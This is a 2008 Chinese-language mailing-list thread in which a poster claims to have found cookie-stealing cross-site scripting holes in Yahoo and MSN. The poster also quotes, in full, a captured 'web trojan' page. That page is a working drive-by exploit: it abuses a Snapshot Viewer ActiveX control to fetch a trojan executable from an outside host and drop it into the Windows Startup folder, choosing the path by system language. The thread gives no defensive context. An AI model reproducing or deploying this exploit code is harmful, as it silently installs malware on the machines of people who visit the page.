呵呵 我是从来不破坏人家吃饭的东西的 。我是不会暴的。

2008/10/23 live live <[EMAIL PROTECTED]>

> 估计很快又要爆了,公开讨论的时候就是漏洞要爆的时候!
>
> 2008/10/23 hackoday hackoday <[EMAIL PROTECTED]>
>
>>
>> 有能讨论的 就加我QQ吧 190000973 .我的地址
>> [EMAIL PROTECTED] |
>> 2008/10/23 [EMAIL PROTECTED] <[EMAIL PROTECTED]>
>>
>> 2008-10-23
>>>
>>>
>>> 今天   好像yahoo跟MSN的跨站漏洞有被我挖掘到了
>>>
>>>
>>> 透露下一点点的小信息 跟上次的2次的 一样 关键部分还是有点小变化的 利用的document.cookie);关键语句达到跳
>>>
>>>
>>> 转目的 地址:http://www.coloreagle.com/hotmail/
>>>
>>>
>>> http://www.coloreagle.com/yahoo/
>>>
>>>
>>> 我还无意中抓到了一个网马
>>>
>>> http://www.coloreagle.com/yahoo/ddd.html
>>>
>>>
>>>
>>> 代码如下:<html>
>>> <object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'
>>> id='obj'></object>
>>>
>>>
>>>
>>> <script language='JavaScript'>
>>>        var buf1 = 'http://www.coloreagle.com/yahoo/a.exe';
>>>        var buf2;
>>>        var sysLanguage;
>>>        sysLanguage=navigator.systemLanguage?
>>> navigator.systemLanguage:navigator.language;
>>>        if(sysLanguage == 'en-us' || sysLanguage == 'en-us'){
>>>                buf2="C:/Documents and Settings/All Users/Start
>>> Menu/Programs/
>>> Startup/setup.exe";
>>>        }
>>>        if(sysLanguage == 'zh-cn' || sysLanguage == 'zh-CN'){
>>>                 buf2 = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/
>>> setup.exe";
>>>
>>>        }
>>>        obj.SnapshotPath = buf1;
>>>        obj.CompressedPath = buf2;
>>>        obj.PrintSnapshot();
>>>
>>> </script>
>>> </html>
>>>
>>>
>>>
>>> 区分中英文版本 A。EXE是个木马 呵呵,
>>>
>>>
>>>
>>>  具体的细节我就不透露过多了 毕竟一些大牛牛还是要靠这些来吃饭的
>>>
>>>
>>>
>>>
>>> [EMAIL PROTECTED] 本人联系方式。有任何意见可以跟我交流
>>
>>
>>
>>
>>
>
> >
>

--~--~---------~--~----~------------~-------~--~----~
 要向邮件组发送邮件,请发到 [email protected]
 要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---

回复